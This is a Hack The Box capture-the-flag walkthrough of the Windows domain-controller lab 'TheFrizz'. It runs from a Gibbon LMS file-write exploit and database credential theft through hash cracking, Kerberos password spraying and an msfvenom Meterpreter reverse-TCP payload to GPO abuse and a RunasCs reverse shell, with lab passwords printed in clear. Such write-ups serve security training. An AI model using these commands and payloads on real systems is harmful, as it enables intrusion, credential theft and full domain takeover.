HTB | TheFrizz

This is a Windows box. You can find it here

IP - 10.10.11.60

Nmap

└─$ nmap -sT -p- --min-rate 10000 10.10.11.60 -Pn -oA nmap_ports                                                                                                                                        
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2025-05-07 14:39 IST
Nmap scan report for 10.10.11.60
Host is up (0.25s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
9389/tcp  open  adws
49664/tcp open  unknown
49668/tcp open  unknown
49670/tcp open  unknown
56383/tcp open  unknown
56387/tcp open  unknown
56397/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 54.76 seconds

└─$ nmap -sC -sV -p 22,53,80,88,135,139,389,445,464,593,636,3268,3269,9389,49664,49668,49670,56383,56387,56397 10.10.11.60 -Pn -oA nmap_ports_details
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2025-05-07 14:41 IST
Nmap scan report for 10.10.11.60
Host is up (0.25s latency).

PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to <http://frizzdc.frizz.htb/home/>
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-07 16:11:56Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
56383/tcp open  msrpc         Microsoft Windows RPC
56387/tcp open  msrpc         Microsoft Windows RPC
56397/tcp open  msrpc         Microsoft Windows RPC
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-05-07T16:12:51
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m02s

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 108.22 seconds

Port 80

Let’s add frizzdc.frizz.htb to hosts file

└─$ sudo echo "10.10.11.60 frizzdc.frizz.htb" | sudo tee -a /etc/hosts
[sudo] password for anurag: 
10.10.11.60 frizzdc.frizz.htb

website

going through the website, we found the Gibbon LMS staff login page http://frizzdc.frizz.htb/Gibbon-LMS/

Foothold/shell

CVE-2023-34598

We have found a **CVE-2023-34598** on the advisory page, and according to that Gibbon v25.0.0 is vulnerable to a Local File Inclusion

We have found a POC on MaddSec GitHub, and according to that

In order to exploit the vulnerability, an attacker would need to manipulate the "q" parameter to query a local file. This manipulation would cause the file to be included in the server's response. However, it's important to note that this exploit is only effective for files located within the installation folder and under specific conditions, which exclude PHP files, for instance.

Let’s try to exploit this, and for that, we will try gibbon.sql

There was no interesting information in there.

CVE-2023-45878

On looking for other exploits, we found CVE-2023-45878 and this GitHub exploit

GibbonEdu Gibbon version 25.0.1 and before allows Arbitrary File Write because rubrics_visualise_saveAjax.phps does not require authentication. The endpoint accepts the img, path, and gibbonPersonID parameters. The img parameter is expected to be a base64 encoded image. If the path parameter is set, the defined path is used as the destination folder, concatenated with the absolute path of the installation directory. The content of the img parameter is base64 decoded and written to the defined file path. This allows creation of PHP files that permit Remote Code Execution (unauthenticated).

Let’s clone the repo and try to exploit CVE-2023-45878

and we are able to run commands on the shell

shell as w.webservice

Now let’s try to get shell

We found the database credentials in config.php

MySql

We have found mysql.exe and we have the credentials. Let’s try to enumerate databases.

PS C:\\xampp\\mysql\\bin> .\\mysql.exe -u <USERNAME> -p"<Password>" -e "show databases;" 
Database
gibbon
information_schema
test

list tables in gibbon

PS C:\\xampp\\mysql\\bin> .\\mysql.exe -u <USERNAME> -p"<Password>" -e "show tables;" gibbon
Tables_in_gibbon
gibbonaction
gibbonactivity
gibbonactivityattendance
gibbonactivityslot
<--SNIP-->

gibbonperson

<--SNIP-->
gibbonunitclassblock
gibbonunitoutcome
gibbonusernameformat
gibbonyeargroup

Display table Gibbonperson

PS C:\\xampp\\mysql\\bin> .\\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "use gibbon; SELECT * from gibbonperson;" -E
*************************** 1. row ***************************
           gibbonPersonID: 0000000001
                    title: Ms.
                  surname: Frizzle
                firstName: Fiona
            preferredName: Fiona
             officialName: Fiona Frizzle
         nameInCharacters: 
                   gender: Unspecified
                 username: f.frizzle
           passwordStrong: <PASSOWRD>
       passwordStrongSalt: /<salt>
       passwordForceReset: N
                   status: Full
                 canLogin: Y
      gibbonRoleIDPrimary: 001
          gibbonRoleIDAll: 001
                      dob: NULL
                    email: f.frizzle@frizz.htb
           emailAlternate: NULL
                image_240: NULL
            lastIPAddress: ::1
            lastTimestamp: 2024-10-29 09:28:59
        lastFailIPAddress: NULL
        lastFailTimestamp: NULL
                failCount: 0

We have found salt and an encrypted password for Fiona Frizzle

shell as f.frizzle

The password looks like a SHA-256 hash, which GibbonCMS uses by default:

hash('sha256', $salt . $password)

So the logic is:

HASH = sha256(salt + password)

cracking password

We need to convert the hash and salt to a format that Hashcat understands.

• Hash function: SHA256(salt + password)

• Hashcat mode: 1420 → sha256($salt.$pass)

//format
<hash>:/<salt>

Let’s create a file (e.g., gibbon.hash) with this and run it with rockyou.txt

└─$ hashcat -m 1420 -a 0 f.frizzle.hash /home/anurag/stuff/rockyou.txt

And we have cracked the password

shell via tgt

not able to validate credentials via netexex smb and evil-winrm

I have checked that the user exists (maybe the password was old?)

I can confirm the credentials using Kerbrute

└─$ sudo ntpdate 10.10.11.60

└─$ ./kerbrute bruteuser --dc 10.10.11.60 -d frizz.htb pass.txt f.frizzle -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\\___/_/  /_.___/_/   \\__,_/\\__/\\___/                                        

Version: v1.0.3 (9dad6e1) - 05/08/25 - Ronnie Flathers @ropnop

2025/05/08 01:30:42 >  Using KDC(s):
2025/05/08 01:30:42 >   10.10.11.60:88

2025/05/08 01:30:43 >  [+] VALID LOGIN:  f.frizzle@frizz.htb:<PASSOWRD>
2025/05/08 01:30:43 >  Done! Tested 1 logins (1 successes) in 0.555 seconds

So that means the credential is correct.

Since we have the valid credentials, we can forge a ticket and login via that ticket

└─$ impacket-getTGT frizz.htb/'f.frizzle':'<PASSWORD>' -dc-ip 10.10.11.60  

└─$ export KRB5CCNAME=f.frizzle.ccache

└─$ klist

└─$ evil-winrm -i frizzdc.frizz.htb -k f.frizzle.ccache -r frizz.htb 

💡Don’t forget to add below in /etc/krb5.conf

[libdefaults]
    default_realm = FRIZZ.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = true
    ticket_lifetime = 24h
    forwardable = true
    
[realms]
FRIZZ.HTB = {
    kdc = frizzdc.frizz.htb
    admin_server = frizzdc.frizz.htb
}

[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB

Only put the above in the config file and SSH

ssh f.frizzle@frizz.htb -K

And we found user.txt

Privilege Escalation

Bloodhound

Since we have valid credentials, we can use BloodHound to collect data and analyse further

└─$ bloodhound-python -u 'f.frizzle' -p 'Jenni_Luvs_Magic23' -d frizz.htb -dc frizzdc.frizz.htb -ns 10.10.11.60  -c all  --zip

After checking privilege for all the user we found m.schoolbus have a lot of privileges

shell as w.schoolbus

Nothing interesting was found via Winpeas and powerup

Let’s look for hidden files

PS C:\\> ls -force

we found some zip files

I tried many ways to copy, but none of them worked, in the end, I had to use Meterpreter.

• Make a reverse TCP payload via msfvenom

• Copy it to the Windows box

• Start Meterpreter handler and execute that payload

• Once we have Meterpreter shell, we can copy the file

└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=1234 -f exe -o payload.exe

PS C:\\$RECYCLE.BIN\\S-1-5-21-2386970044-1145388522-2932701813-1103> Invoke-WebRequest -Uri "<http://10.10.16.4/payload.exe>" -outfile "payload.exe"

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST tune0
set LPORT 1234
run

meterpreter > download $IE2XMEG.7z 
meterpreter > download $RE2XMEG.7z 

I was able to extract $RE2XMEG.7z

found some credentials

└─$ grep -ri "password" wapt/conf 

It was base64 encrypted so I could decrypt and get the clear text password

Let’s use Kerbrute to find the correct user name.

But first let’s get the list of username

PS C:\\Users\\f.frizzle> Get-ADUser -Filter * -Properties * | select name

name
----
Administrator
Guest
krbtgt
f.frizzle
w.li
h.arm
M.SchoolBus
d.hudson
k.franklin
l.awesome
t.wright
r.tennelli
J.perlstein
a.perlstein
p.terese
v.frizzle
g.frizzle
c.sandiego
c.ramon
m.ramon
w.Webservice

Now we can copy the list to users.txt and perform passwordspary is Kerbrute

└─$ ./kerbrute passwordspray -d frizz.htb --dc 10.10.11.60 users.txt '<PASSWORD>' -v

we found a match M.schoolbus

Let’s perform the same tgt stuff we did for f.frizzle

└─$ kinit M.SchoolBus@FRIZZ.HTB

└─$ klist         

└─$ ssh M.SchoolBus@10.10.11.60 -K

Administrator privilege

From the whoami /groups output, we know we are frizz\\Group Policy Creator Owners

This means we do have permission to create Group Policy Objects (GPOs) in the domain.

By default, members of the Group Policy Creator Owners can:

• Create new GPOs

• Edit or delete GPOs they created

GPO Abuse

Now we have to use SharpGPOAbuse to add us to the administrator group, and for that, we need to

• Create a GPO named pain.

• Link it to the DOMAIN CONTROLLERS organizational unit in the FRIZZ.HTB domain.

• Make sure the link is enabled so that the GPO takes effect on all objects within the OU (ie, domain controllers).

PS C:\\Users\\M.SchoolBus> New-GPO -Name "TestGPO" | New-GPLink -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes

GpoId       : 416eb50f-4fda-41e6-9475-c7a9bedb6f07
DisplayName : TestGPO
Enabled     : True
Enforced    : False
Target      : OU=Domain Controllers,DC=frizz,DC=htb
Order       : 2

PS C:\\Users\\M.SchoolBus>

Now we have to download SharpGPOAbuse and execute it

PS C:\\Users\\M.SchoolBus> Invoke-WebRequest -uri "<http://10.10.16.7/SharpGPOAbuse.exe>" -outfile SharpGPOAbuse.exe

PS C:\\Users\\M.SchoolBus> .\\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName TestGPO
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of M.SchoolBus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "TestGPO" is: {6A50C9A1-E986-42CF-BAB1-B96C4557E011}
[+] Creating file \\\\frizz.htb\\SysVol\\frizz.htb\\Policies\\{6A50C9A1-E986-42CF-BAB1-B96C4557E011}\\Machine\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!

PS C:\\Users\\M.SchoolBus> gpupdate /force                     
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

PS C:\\Users\\M.SchoolBus>

Now, ideally, we need to logoff and login again for this to take effect, but in our case (since we are on HTB and it has multiple instances), we cannot do that

So we will use RunasCs because we are getting a permission denied when trying runas

RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credentials. This tool is an improved and open version of windows builtin runas.exe

//on Windwos box
PS C:\\Users\\M.SchoolBus> Invoke-WebRequest -uri "<http://10.10.16.7/RunasCs.exe>" -OutFile RunasCs.exe            
PS C:\\Users\\M.SchoolBus> .\\RunasCs.exe M.SchoolBus <PASSWORD> cmd.exe -r 10.10.16.7:1234                          

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\\Desktop: Service-0x0-bd6f6$\\Default
[+] Async process 'C:\\Windows\\system32\\cmd.exe' with pid 2724 created in background.
PS C:\\Users\\M.SchoolBus> 

//on our machine
└─$ nc -nlvp 1234          
listening on [any] 1234 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.60] 63289
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.

C:\\Windows\\system32>whoami
whoami
frizz\\m.schoolbus

C:\\Windows\\system32>cd C:\\Users\\Administrator\\Desktop
cd C:\\Users\\Administrator\\Desktop

C:\\Users\\Administrator\\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D129-C3DA

 Directory of C:\\Users\\Administrator\\Desktop

03/11/2025  04:14 PM    <DIR>          .
03/11/2025  03:37 PM    <DIR>          ..
02/25/2025  03:06 PM             2,083 cleanup.ps1
05/11/2025  08:42 AM                34 root.txt
               2 File(s)          2,117 bytes
               2 Dir(s)   2,085,539,840 bytes free

C:\\Users\\Administrator\\Desktop>

And we have root.txt